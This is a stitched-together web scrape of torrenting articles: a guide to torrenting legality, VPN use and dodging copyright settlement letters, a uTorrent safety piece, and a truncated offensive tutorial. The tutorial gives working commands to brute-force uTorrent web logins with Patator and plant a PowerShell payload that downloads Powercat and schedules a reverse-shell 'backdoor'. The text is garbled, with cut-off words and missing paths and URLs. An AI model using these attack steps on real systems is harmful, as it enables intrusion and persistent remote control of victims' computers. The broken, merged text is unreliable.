What is Torrenting? Is it Safe? Is it illegal? Will you be caught?
Looking to find out more about torrenting? We explain exactly what torrenting is, how to torrent safely, and what to do if you get caught.
@pabischoff UPDATED: April 8, 2021
Three questions I’m often asked are: Is torrenting safe, is torrenting legal, and what happens if I get caught? This post answers those questions and looks at the methods torrenters use to stay safe and anonymous.
What is Torrenting?
Torrenting is the act of downloading and uploading files through the BitTorrent network. Instead of downloading files to a central server, torrenting involves downloading files from other users’ devices on the network. Conversely, users upload files from their own devices for other users to download.
Torrenting is the most popular form of peer-to-peer (P2P) file-sharing, and it requires torrent management software to connect to the BitTorrent network. Such software can be downloaded for free for a number of different devices.
Everyone downloading or uploading the same file is called a peer, and collectively they are known as a swarm. Because of how BitTorrent works, a peer can download a file from several other users at once, or upload a file to multiple other users simultaneously.
Torrenting is often associated with piracy because it’s frequently used to share files that are protected by copyright, including movies, games, music, and software. However, torrenting has many legitimate uses as well, such as lessening the load on centralized servers by distributing the hosting burden among users.
Torrenting safety and legality: In short
Is torrenting legal or illegal? Torrenting itself isn’t illegal, but downloading unsanctioned copyrighted material is. It’s not always immediately apparent which content is legal to torrent and which isn’t. Some fall in a gray area, so you may find yourself unwittingly on the wrong side of the law.
Your internet service provider (ISP) and copyright trolls monitoring the BitTorrent network can take action if they catch you illegally torrenting. This can range from a warning letter and throttling (slowing down) of your internet connection speeds to legal action – although the latter is increasingly rare.
Digital privacy-conscious torrenters will use VPN services, or virtual private networks, to keep their internet activity hidden from their ISP. With a wide range of applications, some VPNs are better suited for torrenting than others. If you want to keep your ISP from snooping on your activity, choose a VPN connection that: a) doesn’t keep a log of your activity, b) isn’t based in a country where the legal system can be used to demand customer records, and c) is fast enough that it won’t slow entire downloads. We’ve rounded up the providers that fit these criteria and others in our list of the best torrenting VPN services.
How to torrent safely
It is relatively simple to torrent safely and keep your online activity private. Note that while a VPN for torrenting will keep your activity private and safe from prying eyes you may still be susceptible to malware from some public torrent sites. Follow these 5 steps to torrent privately with a VPN.
Here’s how to torrent safely:
Download and install a VPN matching the criteria mentioned above. We recommend NordVPN.
Enable your VPN’s kill switch, if it has one.
Connect to a VPN server, preferably in a P2P-friendly country
Once the connection is established, open your torrent client and start downloading as usual
Your online activity is now encrypted by your VPN
WANT TO TRY THE TOP VPN RISK FREE? NordVPN is offering a fully-featured risk-free 30-day trial if you sign up at this page. You can use our #1 VPN for torrenting with no restrictions for a full month—great if you want to try its P2P-optimized servers first-hand.
There are no hidden terms—just contact support within 30 days if you decide NordVPN isn’t right for you and you’ll receive a full refund. Start your NordVPN trial here.
Torrenting without a VPN
Torrenting without a VPN means your internet service provider (ISP) can see your online activity including the sites you visit and the content you view. In certain countries, including the US, ISPs are allowed to share this information with third parties including intellectual property owners. A VPN will keep your online activity private from your ISP.
Is uTorrent safe?
uTorrent is the official torrent client from the creators of the BitTorrent protocol. It is proprietary—not open source—software maintained by a legal US company. Like BitTorrent, the uTorrent software itself is legal, although it can be used for digital piracy. The official uTorrent is free of malware and can be used safely and privately in combination with a VPN. It does not, however, prevent users from downloading malicious files that can infect their device.
The BitTorrent protocol rose to become the most popular medium for peer-to-peer file sharing in the world after the demise of centralized services like Napster and Limewire. Unlike those services, torrenting is almost completely decentralized save for the trackers that allow users to search and download torrent files and magnet links. Torrent files and magnet links are used to find other users on the network who host the desired file or files but do not actually host those files for downloading.
Is BitTorrent safe and legal?
The BitTorrent protocol is not in itself illegal or unsafe. It is just the means to share any type of file, and plenty of legal torrenting services do exist. The most popular torrent trackers, such as ThePirateBay and KickassTorrents, however, operate in a legal grey area, offering users free access to copyrighted content. Sharing and downloading copyrighted content by BitTorrent, or other means, is illegal in many countries and can be unsafe since sites including KickassTorrents have been shown to host malware.
These trackers would argue that they simply find and organize information that is already out there, and they do not illegally host any copyrighted content on their own servers. Just like the BitTorrent protocol itself, they are the means to an end. Not everyone is convinced. Major trackers have come under heavy legal scrutiny from content creators and distributors who argue the trackers enable and encourage theft.
The blame ultimately shifts to the users, the millions of individuals who host files on their personal computers, downloading and uploading movies, games, software, music, ebooks, and more. Users connected to the same tracker are called peers, and they fall into two categories. A leech uses a torrent file or magnet link to download the file from other users on the network who already have the file. These users who already have the file are called seeds. When a leech is finished downloading a file (or even just part of a file), he or she becomes a seed, allowing other leeches to download the file from his or her computer. As a general rule, it’s considered proper pirate etiquette to seed as much as you leech.
Comparitech does not condone or encourage any violation of copyright law or restrictions. Please consider the law, victims, and risks of copyright piracy before downloading copyrighted material without permission.
Legally speaking, seeding and leeching copyrighted material fall into different criminal categories. Think of it like buying illegal drugs: purchasing the drugs for personal use is definitely a crime, but a relatively minor one. Turning around and selling those drugs to others is a much more serious offense. Finding the original source of the drugs, or in this case the HD rip of the new Avengers movie, would be the best case scenario for law enforcement, but that isn’t always possible. The trackers act as the shady back alley marketplaces where all of these transactions go down, but they don’t personally handle any of the drugs.
What happens if you are caught torrenting?
The prosecution of torrent users has been sporadic. The chances of actually going to court or having to pay a settlement are pretty slim, but the penalties can be extremely high. The frequency of copyright holders suing torrenters for copyright infringement peaked in the late 2000s. Copyright pirates were sued for wildly disproportionate amounts of money, and most settled out of court.
These public scare tactics shone poorly on the recording and movie industries because they were portrayed as petty millionaires bullying poor college students. Direct lawsuits are much less common these days, but the campaign against torrenters is far from over.
Now the job of going after individual copyright pirates has been outsourced to a growing number of small businesses known as copyright trolls. These companies locate torrenters who illegally download copyrighted content through their real IP addresses. They then approach the copyright owners and sign a deal that lets them take legal action on their behalf. Others are hired directly by Hollywood production companies to sniff out pirates.
With legal leverage and a list of names, the copyright trolls then go after torrenters via mail, email, or even by going door to door and handing out settlement letters. These letters are not legally binding documents or injunctions. Copyright trolls use intimidation, fear, and shame to make torrenters pay without ever going to court. A common tactic is to threaten to sue for over $100, 000 but only ask for $3, 000 or so in the settlement. That makes the $3, 000 look like a good deal, but going to court is costly and risky for them, so don’t give in if you receive such a letter.
What to do if you receive a settlement letter
The most common way to receive a settlement letter is through your internet provider. A copyright troll will go through the court system to subpoena your ISP and force it to email customers with a legal threat and hand over personal details.
According to US law, an IP address is not a person. If you were contacted through your ISP, chances are that’s because the copyright troll doesn’t know your actual identity yet. If the letter doesn’t contain any identifying information on you, keep it that way and do nothing. Your case could be dismissed before the date that your ISP is set to reveal your personal details to the troll. If you respond and identify yourself, that gives the troll a more direct means of targeting you.
This is a game of probability for copyright trolls. If they send out 1, 000 threatening emails and 50 people reply, they only need a handful to actually cough up money to make it worth their time. Chances are it’s more cost effective for them to move on to the next swarm of torrenters than pursue the remaining 950 people.
If things escalate and you decide to take action, lawyer up. Here’s a list of attorneys compiled by the Electronic Frontier Foundation that specialize in these sorts of cases.
Depending on your ISP, it may take actions against you on its own behalf. That could mean throttling your internet connection or threatening to hand over personal details to a copyright troll. Why does your ISP even care? Because torrenting takes up a lot of bandwidth, and that bandwidth costs ISPs money. On top of that, an ISP could be receiving kickbacks from content owners and their associates.
How to protect yourself
To avoid any legal ramifications, it’s best to simply not torrent. However, if you insist on torrenting, take the time to protect your online privacy and keep copyright trolls at bay.
Use a VPN when torrenting
The best way to torrent safely is by using a VPN. A VPN accomplishes two things: first, it re-routes all your internet traffic through a server in a location of your choosing, which changes your real IP address to one used by hundreds or thousands of other people (assuming your VPN uses shared IP addresses, which most do). This adds a significant layer of anonymity and makes it much more difficult for anyone to track you. Second, a VPN encrypts all your torrent traffic before it leaves your computer. That means your ISP cannot monitor your internet activity, nor can anyone else. And because all your traffic heads to the VPN server first, ISPs can’t even tell where it’s going.
Using a quality VPN is key; don’t settle for a “free” service or VPNs that log your activity, cap your bandwidth and data, or don’t provide sufficient DNS leak protection. Not all VPNs tolerate torrenting. You can check out our list of the best VPNs for torrenting here, which are services with fast download speeds and a focus on online privacy, security and anonymity like NordVPN, Surfshark, and ExpressVPN among others.
If you don’t want to pay for a VPN, you might be considering Tor. Tor is similar to a VPN in that it routes your traffic through several volunteer “nodes” while encrypting traffic. We recommend a VPN over Tor for a couple reasons. First, Tor is slow, and usually best for simple browsing and other low-bandwidth activity. Second, connecting to Tor could actually draw more attention from your ISP and law enforcement, as it’s a well-known tool for hackers and criminals.
Another popular app among torrenters is Peerblock. Peerblock is a desktop firewall with a regularly updated blacklist of IP addresses. These IP addresses belong to entities that try to track your activity online, especially on peer-to-peer networks. Unfortunately, the blacklist is only updated once upon installation. After that, users must pay to keep them updated. Even if you’re willing to pay, it’s unlikely that the blacklist could contain every possible IP address for copyright trolls, universities, and law enforcement. A copyright troll just needs to connect to the swarm–all the devices connected to a single torrent–with an IP that isn’t on that blacklist to get your IP address.
Instead of torrenting, another alternative is Usenet. Usenet is a paid service-usually between $10 and $20 per month–where you download files from centralized servers instead of a network of peers. Usenet downloads are much, much faster; often as fast as your ISP can handle. Usenet is more private as well. The connections take place between you and the provider’s network of servers, and the best providers offer an SSL-encrypted connection. Some even throw in VPNs for good measure. Torrents, on the other hand, require that you share at least some identifying information to connect to the tracker and peers.
Finally, downloading a Usenet file doesn’t mean you have to seed it for other internet users afterward. Legally, this makes you less of a target because you’re not supplying strangers with copyrighted content, at the same time consuming fewer computer resources and internet bandwidth.
Usenet providers make files available for a certain number of days. How many depends on the provider, but the standard is 1, 200 days after the original posting. Until that time is up, users have full access to that file. Torrents only stay up as long as people seed the file.
We’ve rounded up some of the best Usenet providers here.
Public vs private trackers
A “tracker” is like a search engine that indexes files on the BitTorrent network. Trackers can be private or public, and the former usually requires an invitation from an existing member.
ThePirateBay, KickassTorrents, and Demonoid are all examples of public trackers. Anyone can just go to their respective websites and search without logging in or requiring any sort of authentication. Likewise, anyone can upload files for others to download. These uploads are not moderated, so users must judge whether a download is safe and accurate based on comments and the reputation of the uploader.
Private trackers are more exclusive both in terms of who can upload and who can download within a group. They vary wildly in terms of content and quality, but many members of private trackers attest that they have higher quality files, faster downloads, longer retention, and an overall more consistent and safe experience.
The law views private trackers the same as public trackers. Internet piracy is piracy whether you do it in public or within a private group.
Streaming vs torrenting
Many people have moved away from downloading entire files through BitTorrent and opt instead to stream video content either on their web browsers or through customized programs like Kodi. When it comes to safety and the law, what’s the difference?
Legally speaking, you’re probably still breaking the law when you stream illegal content from a pirated source. However, this depends largely on your country. In the UK, it’s outright illegal. In India, a court ruled that it is absolutely not illegal. In the US, it’s still a grey area, as there’s been no precedent of anyone being convicted for copyright piracy after streaming copyrighted video content from an unsanctioned source.
Those who upload the videos without compensating or asking permission from the copyright holder do so illegally. That’s pretty much standard no matter where you are.
Not only do laws tend to be more lenient toward streaming content, but it’s also more difficult for copyright trolls and law enforcement to catch users in the act. When you download a torrent, you can see the IP addresses of everyone else you’re uploading to or downloading from. But streaming transmits a video directly from a website to your device, with no third parties involved.
Don’t get too comfortable, however, as there are still risks. The website could be logging IP addresses or other information about its users, which it could then hand over to law enforcement or a copyright troll. Your ISP could monitor your activity and see that you are watching pirated content. These are risks that can be mitigated by connecting to a reputable VPN.
When it comes to security, streaming video carries just as many risks as torrenting. Websites that stream pirated content tend to be chock full of intrusive ads, malware, and phishing threats. Kodi users are subject to man-in-the-middle (MITM) attacks and other threats from the add-ons they download.
As a rule of thumb, avoid downloading movies that were released on DVD and Blu-Ray in the past 60 days, especially big-hit blockbusters. That’s when movies make the vast majority of their post-box office money, after which their income significantly drops off. Copyright holders will put most of their anti-piracy resources into going after torrenters of new releases to minimize the financial damage. The same goes for TV series, shows and video games.
Users of Popcorn Time, the free movie-streaming app, should tread just as carefully as torrenters. Many Popcorn Time users don’t realize that the app actually streams directly from torrents and will even seed a file so it is uploaded to other users. All the risks associated with Popcorn Time apply in equal measure to torrenting.
Choose your torrents wisely. The most popular torrents on ThePirateBay and KickassTorrents are probably the ones being most closely monitored by copyright trolls. However, don’t pick totally unpopular ones either. Read through the comments section, where users often run virus scans on torrent downloads and post the results. They will also give you a general review of the quality.
Even if the comments are positive, run your own virus scans as well. Ideally, use multiple antivirus programs to run an array of scans, as each of their virus libraries can differ. Not all antivirus programs play nice with each other, however, so mixing two or more must be done with care. We recommend Bitdefender to scan all downloads before opening. This is especially important when downloading games and software, which are often “cracked” by the uploader. Cracks make it easier to bypass DRM schemes that validate content with the publisher, but they also make it easier to distribute hidden malware, spyware, and viruses. Check out Comparitech’s antivirus reviews section here.
Why did BitTorrent install adware on my computer? BitTorrent is a network and protocol used to share files, so BitTorrent itself cannot install adware on your computer.
However, the programs used to connect to the BitTorrent network and download files, called torrent managers or torrent clients, can and often do come with adware. The files you download can also contain malware and adware.
Stick to reputable torrent managers and, if prompted, refuse any offers to install additional software alongside them. These additional programs are often adware.
Likewise, be sure to only download and upload torrents you downloading a shared torrent from Google drive illegal? If you’re downloading something from Google Drive, then it’s not a torrent. It’s just a download. The file might have originally been downloaded through BitTorrent, then uploaded to Google Drive where others can download it.
Semantics aside, if the content of the file is protected by copyright, then yes, it is illegal to download pirated files from Google I just download a torrent from a public place? Most torrenters use public trackers to find and download files through BitTorrent. So in that sense, yes, you can download a torrent from a public place provided you have a torrent client installed on your device.
The files themselves are downloaded from other BitTorrent users who have downloaded the file and are now uploading it to fellow users.
Private trackers are also available and are often safer, but typically require an invitation from an existing I go to jail for torrenting? It depends on the circumstances, but no, it’s highly doubtful you would go to jail for torrenting. Most lawsuits regarding torrenting are civil suits, not criminal ones, so if a penalty is levied, it’s usually a fine or some other monetary compensation.
That being said, it also depends on what country you’re in, what you torrent, and whether you also seeded the file so it could be downloaded by other users. Check your local laws and are the risks of torrenting music? The music recording industry has, on occasion, aggressively targeted torrenters who engaged in music piracy. These days, litigation is mostly done by copyright trolls who target torrenters on behalf of recording studios. They’ll send out settlement letters demanding hundreds or even thousands of dollars to torrenters whom they can identify. They usually go through internet service providers to contact torrenters. Your ISP could throw you under the bus, and that’s not a gamble we recommend taking. By using a VPN, you can greatly reduce the risk of being identified by a copyright troll.
Is uTorrent Safe? – Security Gladiators
Is uTorrent safe? In our experience, the answer to this question may not be as straightforward as you may think.
Let’s take a look at what constitutes safety and whether or not torrent clients like uTorrent can really protect your privacy and security.
‘Is uTorrent Safe’ Is Not the Right Question You Should Be AskingWhat Are the Disadvantages of Torrenting? Simple Ways to Make uTorrent Safe
‘Is uTorrent Safe’ Is Not the Right Question You Should Be Asking
The question should not be, “Is uTorrent safe? ” Instead, we should ask, “How safe can it be? ” In other words, whether or not uTorrent is safe depends entirely on how you use it.
You have to choose how safe you want uTorrent to be.
Ultimately, uTorrent is nothing but a torrent client that helps you download files of all types from the internet if you have the right. torrent file with you.
So how can you be proactive about staying safe while using uTorrent? You can start by encrypting your hard drive.
While downloading files, you should also try to remove all the torrent trackers in your list of trackers (accessible by right-clicking the file that’s being downloaded, then going to the tracker list and deleting all the items from the list with the backspace key).
This is important: We also always recommend using a VPN service to enhance your privacy while you’re downloading files on the internet. We’ll get more into that later.
In itself, uTorrent—as a P2P software program—is safe. You will not get any spyware or malware from installing uTorrent on your computer if you downloaded the program from the company’s official website. If there’s a threat to your computer or your data, then it does not come from uTorrent.
However, this doesn’t mean there’s no threat at all. uTorrent may not want to infect your computer with malware, but there are plenty of actors in the torrenting chain who do. Since uTorrent is a torrent client, it opens the door for ill-intentioned users who are bent on hacking others in the torrenting ecosystem.
Let’s discuss some of the risks that are always present when you’re downloading torrents.
DISCLAIMER: Security Gladiators in no way encourages or condones any kind of copyright violation or circumvention of restrictions. That includes torrenting or downloading illegal content. Torrenting is a great way to access and share all kinds of content on the internet and there are plenty of opportunities there to engage in legal and safe online torrenting. You need to do your own research to see if these services and torrents are legal in your own country. We suggest to always use a VPN while torrenting.
What Are the Disadvantages of Torrenting?
The first problem with using uTorrent is that you can accidentally download files that are infected with viruses.
Warning: Hackers have gained the experience to now know that the easiest way to get a virus to a given user’s computer is to inject it into a torrent file.
And since the user is willingly accepting to download the file themselves the virus gets installed on the system in question with ease. Hackers then proceed to gain access to your computer, get in control of your data, encrypt your hard drive and then demand a ransom payment before you can get your data back. This is the ransomware model.
The second problem regards the legality of torrenting. Many torrents are movies and TV shows that are protected under copyright laws.
Now, if you live in a country where regulatory agencies monitor internet users to see what they’re downloading on the internet, then that could get you in trouble.
In the U. S., you may receive a DMCA notice, in compliance with the Digital Millennium Copyright Act of 1998.
The third problem deals with internet service providers, which are just as likely to spy on you as any given hacker group. With that said, it is also true that different internet service providers take different positions on torrenting and torrent clients.
Some ban it, some are mildly strict with its use, while others allow it as much as the user wants. Some internet service providers will simply cancel your contract with them if they find out you’re using a torrent client to download copyrighted content on the internet.
Internet service providers are also known to collect data on their customers and then sell that data to third parties such as advertising firms.
Government agencies, copyright groups and internet marketing agencies all want to get their hands on your data, and internet service providers are the last entity that you should expect to stand up to them and protect it.
This is why you should always use a VPN (short for Virtual Private Network) while downloading torrent files to ensure that no government agency or internet service provider can see what you’re doing.
The key advantage of using a VPN service is that it encrypts the tunnel through which data enters and exits your internet connection.
So even if your internet service provider can decrypt the tunnel, it still would not be able to decrypt your data. Essentially, a VPN provides double security for your data. More on that below.
Simple Ways to Make uTorrent Safe
The simplest way to make uTorrent safe is to use software that protects your privacy and anonymity. The best tool to do this is a VPN service. Click here to learn more about the best VPN service providers for torrenting. We’ve also put together a ranking of top VPN services. We also have a list of VPNs best for µtorrent.
Secondly, make sure you only download files from sources that are trustworthy. You can go to Reddit and other forums to read about the most reliable torrent sites, then make a decision based on your research. Or click here to read our roundup of the best torrent sites.
Thirdly, use a good antivirus software application so that even if you mistakenly download a virus, you have a tool that can notify you about it.
And finally, have a firewall in place to block malware well before it reaches your data. Almost all operating systems have some sort of firewall. Check to make sure it’s enabled. You can also get personal firewall software for an extra layer of protection.
How to Hack uTorrent Clients & Backdoor the Operating System
Compromised uTorrent clients can be abused to download a malicious torrent file. The malicious file is designed to embed a persistent backdoor and execute when Windows 10 reboots, granting the attacker remote access to the operating system at rrent clients like uTorrent and Transmission have built-in features that allow server administrators to remotely access the torrent client via web application interfaces, as shown in the below image example of uTorrent’s web app. Overall, the number of publicly accessible torrent clients is growing. As torrent clients increase in popularity, so does the number of poorly configured and insecure services. Like all web apps, these clients can be hacked in various ways. For instance, in recent years, numerous directory traversal, privilege escalation, and cross-site scripting vulnerabilities have been disclosed, as seen in the image below. In the future, attackers may discover ways of bypassing authentication ‘t Miss: Quickly Enumerate Valid Subdomains for Any Website
Understanding the AttackSo, a torrent client gets hacked… what’s the worst an attacker can do? Pirate some copyrighted materials? Well, yes, but it gets worse. Torrent clients are capable of creating files and directories on the system as well as replacing existing ones. That access to the filesystem can be abused by downloading malicious files through the compromised torrent example, on Windows 10 computers, an attacker can download an executable or script into the Startup directory, as shown in the GIF below. The Startup directory will execute any files it detects without user interaction — every time the server or computer ‘t Miss: How to Disable Startup Programs in Windows 10 Modifying the default download directory in a hacked uTorrent client. Linux systems are equally vulnerable to such attacks but are out of the scope of our demonstration here. The file found in most Linux system is essentially a Bash script that’s executed every time a new terminal is opened or SSH login is established. An attacker can use the compromised torrent client to download a malicious file, replacing the original one found on the server. It would cause the server to execute the attacker’s when someone successfully authenticates to the article will show how uTorrent web apps can be brute-forced and used to download a PowerShell script into the Windows 10 Startup directory. The PowerShell script is designed to embed a persistent backdoor and immediately delete itself when completed.
Step 1: Brute-Force the Login with PatatorAs research suggests, most passwords are six to eight characters in length. Weak passwords may allow attackers to guess the uTorrent login password and begin manipulating files on the tator is a brute-forcing tool, like Hydra, Medusa, and Burp’s Intruder module. Using Patator to brute-force web app logins is very similar to brute-forcing router gateways. In my previous article, “Break into Router Gateways with Patator, ” command line usage and examples are covered in great Info: How to Break into Router Gateways with Patator
1. Install PatatorTo get started, install Patator with the following command if it’s not already installed. In full versions of Kali Linux, Patator may already be on the system. ~# apt-get update && apt-get install patator
Reading package lists… Done
Building dependency tree
Reading state information… Done
The following NEW packages will be installed:
ca-certificates-java default-jre default-jre-headless fonts-dejavu-extra freerdp2-x11 ike-scan java-common ldap-utils libatk-wrapper-java libatk-wrapper-java-jni libfreerdp-client2-2
libfreerdp2-2 libgif7 libwinpr2-2 openjdk-11-jre openjdk-11-jre-headless patator python3-ajpy python3-bcrypt python3-dnspython python3-ipy python3-mysqldb python3-nacl python3-openssl
python3-paramiko python3-psycopg2 unzip
0 upgraded, 27 newly installed, 0 to remove and 0 not upgraded.
Need to get 43. 9 MB of archives.
After this operation, 192 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
2. Capture a Login Request with Burp’s ProxyOpen Firefox and Burp Suite. Configure Firefox to proxy requests through Burp and capture the login request. Replace the encoded “Authentication: Basic” string with “FILE0, ” right-click it, and choose the “Copy to file” option. The FILE0 string will act as a placeholder for Patator’s wordlist. Save the request to the /tmp directory with the “” ‘t Miss: Use Burp & FoxyProxy to Easily Switch Between Proxy Settings
3. Generate a Targeted has published wordlists containing cracked passwords obtained in recent years. The 2018 wordlist, highlighted in the image below, can be downloaded by navigating to the website. That’s the one we’re using as an example in this guide. Unzip the archive with the 7z x archive. 7z command, where “archive” is the directory and filename of the compressed file you downloaded. For instance: ~# 7z x /root/Downloads/
7-Zip  16. 02: Copyright (c) 1999-2016 Igor Pavlov: 2016-05-21
p7zip Version 16. 02 (, Utf16=on, HugeFiles=on, 64 bits, 4 CPUs Intel(R) Core(TM) i7-4770HQ CPU @ 2. 20GHz (40661), ASM, AES-NI)
Scanning the drive for archives:
1 file, 1424620615 bytes (1359 MiB)
Extracting archive: /root/Downloads/
Path = /root/Downloads/
Type = 7z
Physical Size = 1424620615
Headers Size = 142
Method = LZMA:24
Solid = –
Blocks = 1
Everything is Ok
Compressed: 1424620615 Then, encode each line in the wordlist with base64. The “admin” username is the default with uTorrent web apps. Swap out the “. /” directory and file with the location and name of your downloaded wordlist. ~# while read password; do printf “admin:$password” | base64; done <. / >>. /
4. Brute-Force with PatatorIn my tests against uTorrent version 3. 5. 5 in Windows 10, there didn’t seem to be any kind of blacklisting or rate-limiting invoked by hundreds of thousands of failed login attempts. It would appear uTorrent allows an infinite number of login attempts over any prolonged period of brute-force uTorrent web logins, use the below patator command with the file created in step two. Make sure you substitute any paths below to the right directory, as yours may be different. ~# patator _fuzz raw_request=/tmp/ accept_cookie=1 follow=1 0=. /
16:31:45 patator INFO – Starting Patator v0. 7 () at 2020-01-29 16:31 EST To break that command down_raw_request= — Use the created in an earlier step to generate login attempts against the web app. accept_cookie= — Save received cookies to issue them in future requests. follow= — Follow Location redirects for both failed and successful login attempts if instructed by the server. 0= — The “FILE0” placeholder in the will iterate through the provided list of passwords. After executing the Patator command, the output will appear as shown below: code size:clen time | candidate | num | mesg
401 159:0 0. 004 | YWRtaW46ISEhbWFmZWlmZWkxMjM0NQ== | 9902 | HTTP/1. 1 401 Unauthorized
401 159:0 0. 000 | YWRtaW46ISEhbWFydGluYTk1 | 9912 | HTTP/1. 000 | YWRtaW46ISEhbWVpbnMhISE= | 9922 | HTTP/1. 007 | YWRtaW46ISEhbWljaCEhIQ== | 9932 | HTTP/1. 001 | YWRtaW46ISEhbW9t | 9942 | HTTP/1. 000 | YWRtaW46ISEhbmFpY3VMISEh | 9952 | HTTP/1. 000 | YWRtaW46ISEhbmV3d2F2ZQ== | 9962 | HTTP/1. 000 | YWRtaW46ISEhbm93YXk= | 9972 | HTTP/1. 000 | YWRtaW46ISEhb29vNTIx | 9982 | HTTP/1. 000 | YWRtaW46ISEhcGluayEhIQ== | 9992 | HTTP/1. 000 | YWRtaW46ISEhbWFyeTEyMw== | 9913 | HTTP/1. 000 | YWRtaW46ISEhbWVsbDI3ODE= | 9923 | HTTP/1. 001 | YWRtaW46ISEhbWljaGVsbGU= | 9933 | HTTP/1. 000 | YWRtaW46ISEhbW9uZXk= | 9943 | HTTP/1. 000 | YWRtaW46ISEhbmFtYXN0ZTIy | 9953 | HTTP/1. 000 | YWRtaW46ISEhbmlhaXdvYnU= | 9963 | HTTP/1. 000 | YWRtaW46ISEhbndseTAy | 9973 | HTTP/1. 000 | YWRtaW46ISEhb3N0YXAhISE= | 9983 | HTTP/1. 000 | YWRtaW46ISEhcGlwa2EyMDA0ISEh | 9993 | HTTP/1. 000 | YWRtaW46ISEhbWFzY3VsaW5vISEh | 9915 | HTTP/1. 000 | YWRtaW46ISEhbWVuZzEyMw== | 9925 | HTTP/1. 000 | YWRtaW46ISEhbWluaW9uNTg= | 9935 | HTTP/1. 000 | YWRtaW46ISEhbXVja2VsMDgxNQ== | 9945 | HTTP/1. 000 | YWRtaW46ISEhbmFuZGExOTk1 | 9955 | HTTP/1. 000 | YWRtaW46ISEhbmlja2k= | 9965 | HTTP/1. 000 | YWRtaW46ISEhbzc3M2g= | 9975 | HTTP/1. 1 401 Unauthorized
200 42340:42176 0. 073 | YWRtaW46UGFTU3dvUkRAMTIzNA== | 9985 | HTTP/1. 1 200 OK
401 159:0 0. 004 | YWRtaW46ISEhcG9wOTI= | 9995 | HTTP/1. 1 401 Unauthorized
Hits/Done/Skip/Fail/Size: 10000/10000/0/0/10000, Avg: 1607 r/s, Time: 0h 0m 6s Failed login attempts can be filtered out. Successful logins can be decoded with base64. For example: ~# base64 -d <<< 'YWRtaW46UGFTU3dvUkRAMTIzNA==' admin:[email protected] Step 2: Modify the Default Download DirectoryAfter gaining access to the torrent client, if there are no active downloads, simply add any torrent file and click the "General" tab to identify the username on the Windows system. The torrent can be deleted after discovering the username. Open the "Preferences" and click on the "Directories" tab. Check the "Put new downloads in" button and enter the following Startup directory. C:\Users\
Step 3: Create the PowerShell script () will embed a persistent backdoor with the schtasks command and remove evidence of itself from the Startup is only one example of a PowerShell payload. The script can execute a wide range of automated attacks, such as sensitive file exfiltration, desktop live-streaming, password dumping, and converting the device into a web are several lines in the below PowerShell payload. Comments have been added to help explain what each line does. # A new directory is created called “Windows” in an attempt to
# hide a malicious script in plain sight.
# Invoke-WebRequest is used to download Powercat, a Netcat-like
# PowerShell module. The Powercat script is saved in the
# new “Windows” directory.
iwr ” -O C:\Users\$env:username\Windows\1
# The schtasks command is executed to create a new scheduled task
# called “backdoor. ” The task will import the Powercat script
# and attempt to create a TCP connection to the attacker’s system
# every time the Windows 10 computer becomes idle.
schtasks /create /f /tn backdoor /tr ‘powershell /w 1 -ep bypass /C ipmo C:\Users\$env:username\Windows\1;powercat -c -p 9999 -e powershell’ /sc onidle /i 1
# The is removed from the Startup directory.
rm C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\ Create a directory called “torrent” with the mkdir command. ~# mkdir torrent/ Change into the new directory. ~# cd torrent/
~/torrent# The above payload has been condensed into one line, chained together by semicolons, which will allow Windows 10 to cleanly execute all of the desired code as one nano to create a new “” file: ~/torrent# nano And save the below PowerShell script to the file: powershell -ep bypass /w 1 “& mkdir C:\Users\$env:username\Windows;iwr ” -O C:\Users\$env:username\Windows\1;schtasks /create /f /tn backdoor /tr ‘powershell /w 1 -ep bypass /C ipmo C:\Users\$env:username\Windows\1;powercat -c -p 9999 -e powershell’ /sc onidle /i 1;rm C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\” Notice the grave accent (`) in the “”Start` Menu”” file path. This is not a typo. The grave accent character is a solution to escape ‘t Miss: Create an Undetectable Payload with Unicorn